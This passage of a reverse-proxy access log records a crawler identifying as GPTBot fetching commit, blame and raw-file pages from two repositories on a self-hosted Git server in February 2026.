74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt" +[17/Feb/2026:15:32:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/letsencrypt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt" +[17/Feb/2026:15:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/letsencrypt" +[17/Feb/2026:15:32:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt" +[17/Feb/2026:15:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt" +[17/Feb/2026:15:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt" [Client 74.7.227.38] [Length 9817] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt" +[17/Feb/2026:15:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10168] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:32:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:15:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 20580] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:15:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11502] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10420] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11533] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13487] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10388] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12156] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11492] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13519] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 24917] [Gzip 11.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10308] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 48131] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10382] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10413] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13219] [Gzip 6.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10383] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 24200] [Gzip 11.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 15405] [Gzip 7.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 17835] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 26930] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 26177] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11436] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 21995] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" +[17/Feb/2026:15:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13251] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11061] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11523] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 22028] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" +[17/Feb/2026:15:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12125] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 